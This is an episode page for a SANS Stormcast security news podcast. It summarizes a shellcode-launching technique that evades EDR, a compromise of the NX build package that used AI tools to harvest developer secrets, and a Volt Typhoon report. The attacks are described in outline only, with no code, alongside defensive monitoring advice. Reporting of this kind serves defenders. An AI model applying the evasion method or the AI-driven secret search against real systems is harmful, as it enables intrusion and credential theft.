SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast) SANS Stormcast Thursday, August 28th, 2025: Launching Shellcode; NX Compromise; Volt Typhoon Report
Aug 28, 2025
Discover an intriguing malware technique that uses PowerShell to launch shellcode, evading security protocols. Learn about the NX build package compromise that leveraged AI to pilfer credentials. The discussion also highlights a global report on the 'Volt Typhoon' cyber threat, revealing the extensive impact of state-sponsored espionage. Stay informed about these critical cyber risks and how they may affect systems worldwide.
AI Snips
Chapters
Transcript
Episode notes
Shellcode Via CallWindowProcA
- Attackers can execute shellcode by passing a memory pointer into CallWindowProcA instead of creating a new thread or marking memory executable.
- This technique can evade EDRs that look for the common allocate-copy-execute pattern.
Monitor Uncommon API Execution
- Monitor for uncommon API usage patterns like unexpected calls to CallWindowProcA and in-memory payload execution.
- Use behavior-based EDR rules that flag execute-from-data patterns rather than only allocation/syscall signatures.
NX Supply-Chain Compromise
- The open-source NX build tool was compromised and delivered a telemetry.js that used AI tools to search developer machines for secrets.
- Stolen secrets, especially crypto keys and deploy keys, were posted to new GitHub repos under victims' accounts.